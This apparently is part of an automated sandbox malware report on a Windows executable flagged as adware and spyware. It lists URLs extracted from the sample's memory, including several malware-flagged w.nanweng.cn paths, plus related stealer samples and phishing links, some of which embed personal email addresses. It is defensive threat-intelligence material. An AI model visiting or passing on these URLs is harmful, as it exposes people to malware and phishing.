                                                    https://c.msn.com/c.gif?rnd=1735914359600&udc=true&pg.n=startpage&pg.t=hp&pg.c=&pg.p=prime&rf=&tp=htnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3286553261.000000000B6C3000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3278061822.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsjsnv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://deff.nelreports.net/api/reportnv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://docs.google.com/nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com/apc/trans.gif/Mnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://github.com/Raicuparta/rai-pal/issues/145y=nv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.msn.com/PV.xmlGQ=MS.News.Web.AdImpressionXnv8401986_110422.exe, 00000000.00000002.3295450038.000000000CB00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://events-sandbox.data.microsoftstart.com/OneCollector/1.0https://browser.events.data.microsoftnv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.pngmnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://browser.events.data.msn.com/OneCollector/1.0nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngg)nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://w.nanweng.cn:80/qy/pngnv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://w.nanweng.cn/bqdnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006BFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://www.msn.comnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.000000000083C000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/Raicuparta/rai-pal/issues/145(nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.msn.comPnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://github.com/RaicuEnv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.msn.com/?ocid=iehpC:nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/Raicuparta/rai-pal/issues/145Wnv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com/apc/trans.gifQnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://w.nanweng.cn:80/qy/pngsersdnv8401986_110422.exe, 00000000.00000002.3274337460.0000000000823000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://chrome.google.com/webstorefnv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://chrome.google.com/webstorenv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://drive-daily-2.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.png)nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://w.nanweng.cn/qy/gl1nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2035873967.00000000040AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          http://w.nanweng.cn/qy/glnv8401986_110422.exe, 00000000.00000003.2035873967.000000000407F000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://code.jquery.com/jquery-3.6.3.min.jsownlnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/Raicupnv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://drive-daily-1.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://github.com/GoogleChrome/chrome-launcher/blob/main/docs/chrome-flags-for-tools.mdsearch[1].htm.0.drfalse
                                                                                                    high
                                                                                                    https://www.msn.com/?ocid=iehp3.6.3.min.jstandardnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/Env8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016646782.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://drive-daily-5.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.msn.com/nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.msn.com/?ocid=iehp3.6.3.min.jstps://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/lnv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.msn.com/?ocid=iehpnv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3290088545.000000000BBB0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2049616047.000000000AEA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://cdn.fengdf.cn/youxi/index_%d_%d.htmThumWndClass/qy/o/qy/rq/qy/rq2procgcp=/qy/gcpcpr=/qy/cprdanv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refnv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://chromewebstore.google.com/nv8401986_110422.exe, 00000000.00000003.2017194964.0000000000881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://aefd.nelreports.net/api/report?cat=bingrmsnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://drive-preprod.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.msn.com/?ocid=iehp48nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://chrome.google.com/webstore/nv8401986_110422.exe, 00000000.00000003.2017194964.0000000000881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://w.nanweng.cn/qy/rqhnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.jsnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drfalse
                                                                                                                                high
                                                                                                                                https://assets.msn.com/config/v1/$nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://browser.events.data.msn.com/nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://chrome.google.com/webnv8401986_110422.exe, 00000000.00000003.2017309772.0000000000847000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://.sqnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://msn.com/en-us/news/us/about-us/ar-BBN0NAKInternetnv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png...nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYinv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://w.nanweng.cn/qy/glfnv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            http://w.nanweng.cn/qy/pngnv8401986_110422.exe, 00000000.00000002.3274337460.000000000082E000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://github.com/Raicuparta/rai-pal/discussions/185Tnv8401986_110422.exe, 00000000.00000003.2041511987.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://assets.msn.com/config/v1/Fnv8401986_110422.exe, 00000000.00000002.3288793430.000000000B921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://sb.scorecardresearch.com/bnv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://browser.events.data.msn.com/Unv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.msn.com/?ocid=iehpp/?LinkId=255141/?ocid=iehpnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.msn.com/?ocid=iehpngnv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.png7)yxnv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.msn.com/?ocid=iehpp0nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsnv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/nv8401986_110422.exe, 00000000.00000002.3288793430.000000000B939000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.w3.onv8401986_110422.exe, 00000000.00000002.3299397640.000000000D1F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://c.microsoftstart.com/c.gifnv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://chrome.google.com/webstoreo0nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
https://www.msn.com/?ocid=iehp/?ocid=iehp...1.png | nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp | false
high
https://www.msn.com/?ocid=iehp3.6.3.min.jsmillis: | nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp | false
high
https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngMC | nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp | false
high
https://c.msn.com/K | nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp | false
high
https://www.msn. | nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
unknown
https://www.msn.com/?ocid=iehphttps://www.msn.com/?ocid=iehp | nv8401986_110422.exe, 00000000.00000002.3285524155.000000000B3C3000.00000004.00000800.00020000.00000000.sdmp | false
high
http://w.nanweng.cn:80/qy/lqnrps0sid360softtm1689880905type20uid102e1490f0604c078f675cf9899bc6e6ver6 | nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmp | false
• Avira URL Cloud: malware
unknown
https://drive-autopush.corp.google.com/ | nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmp | false
high
https://www.msn.com/fr-ch/actualite/other/Mentions-l | nv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3285360334.000000000B130000.00000004.00000020.00020000.00000000.sdmp, experience.b374b0d5b40196862f17[1].js.0.dr | false
high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
47.103.45.17 | w.nanweng.cn | China | | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
18.244.18.122 | sb.scorecardresearch.com | United States | | 16509 | AMAZON-02US | false
151.101.194.137 | code.jquery.com | United States | | 54113 | FASTLYUS | false
                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                    Analysis ID:1583791
                                                                                                                                                                                    Start date and time:2025-01-03 15:25:05 +01:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 6m 12s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:5
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:nv8401986_110422.exe
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.adwa.spyw.evad.winEXE@1/81@12/3
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 92%
                                                                                                                                                                                    • Number of executed functions: 729
                                                                                                                                                                                    • Number of non-executed functions: 52
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.56.254.14, 2.23.227.208, 2.23.227.215, 2.23.227.221, 204.79.197.203, 2.23.209.23, 2.23.209.15, 2.23.209.12, 2.23.209.13, 2.23.209.20, 2.23.209.17, 2.23.209.21, 2.23.209.16, 2.23.209.19, 13.74.129.1, 20.50.80.213, 13.107.21.237, 204.79.197.237, 40.126.32.134, 20.190.160.17, 40.126.32.74, 20.190.160.22, 20.190.160.14, 40.126.32.136, 40.126.32.68, 40.126.32.133, 2.18.64.8, 2.18.64.22, 52.140.48.131, 204.79.197.222, 184.28.90.27, 52.149.20.212, 13.107.246.45, 20.109.210.53
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fp.msedge.net, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, p-static.bing.trafficmanager.net, ak.privatelink.msidentity.com, e11290.dspg.akamaiedge.net, a-0019.a-msedge.net, go.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, ma1prdapp01-canary.southindia.cloudapp.azure.com, r.bing.com, a-0019.standard.a-msedge.net, a4.bing.com, 1.perf.msedge.net, login.mso.msidentity.com, e28578.d.akamaiedge.net, akam.bing.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, r.bing.com.edgekey.net, www.tm.ak.prd.aadg.akadns.net, a-0003.a-msedge.net, onedscolprdneu08.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, c.bing.com, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, akam.bing.com.edgekey.net, global.asimov.events.data.trafficm
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:25:53 | API Interceptor | 50x Sleep call for process: nv8401986_110422.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
47.103.45.17 | Reflective.dll | malicious | ReflectiveLoader
• w.nanweng.cn/qy/fb
18.244.18.122 | BHgwhz3lGN.exe | malicious | Vidar
18.244.18.122 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
18.244.18.122 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
18.244.18.122 | file.exe | malicious | LummaC, Amadey, Stealc, Vidar
18.244.18.122 | file.exe | malicious | Amadey, Stealc, Vidar
18.244.18.122 | file.exe | malicious | Amadey, Stealc, Vidar
18.244.18.122 | Launcher 1.0.0.exe | malicious | Unknown
18.244.18.122 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
18.244.18.122 | Xeno Executor Setup 1.0.0.exe | malicious | Unknown
18.244.18.122 | file.exe | malicious | Amadey, Stealc, Vidar
151.101.194.137 | http://facebooksecurity.blogspot.dk/ | malicious | Unknown
• code.jquery.com/jquery-1.7.min.js
151.101.194.137 | http://soporte-store.info/icloud2022-esp.php | malicious | Unknown
• code.jquery.com/jquery-1.11.3.min.js
151.101.194.137 | http://mi-outlook-loggin.click/icloud2022-esp.php | malicious | Unknown
• code.jquery.com/jquery-1.11.3.min.js
151.101.194.137 | http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/ | malicious | Unknown
• code.jquery.com/jquery-1.9.1.js
151.101.194.137 | http://facebooksecurity.blogspot.pe/ | malicious | Unknown
• code.jquery.com/jquery-1.7.min.js
151.101.194.137 | https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=demsaenlinea.mx/jahn/00987667839933/utilities@affordablecare.com | malicious | Unknown
• code.jquery.com/jquery-3.3.1.min.js
Match | Associated Sample Name / URL | Detection | Threat Name | Context
code.jquery.com | https://t.co/jNNzVU90SA | malicious | HTMLPhisher
• 151.101.2.137
code.jquery.com | https://realpaperworks.com/wp-content/red/UhPIYa | malicious | Unknown
• 151.101.130.137
code.jquery.com | https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok | malicious | HTMLPhisher
• 151.101.66.137
code.jquery.com | https://www.ecorfan.org/ | malicious | Unknown
• 151.101.194.137
code.jquery.com | https://bitl.to/3Y0B | malicious | CAPTCHA Scam ClickFix
• 151.101.66.137
code.jquery.com | 01012025.html | malicious | HTMLPhisher
• 151.101.66.137
code.jquery.com | 25F.tmp.exe | malicious | Darkbot
• 151.101.2.137
code.jquery.com | https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com | malicious | HTMLPhisher
• 151.101.130.137
code.jquery.com | https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com | malicious | Unknown
• 151.101.2.137
code.jquery.com | EFT Payment_Transcript__Survitecgroup.html | malicious | Unknown
• 151.101.2.137
w.nanweng.cn | Reflective.dll | malicious | ReflectiveLoader
• 47.103.45.17
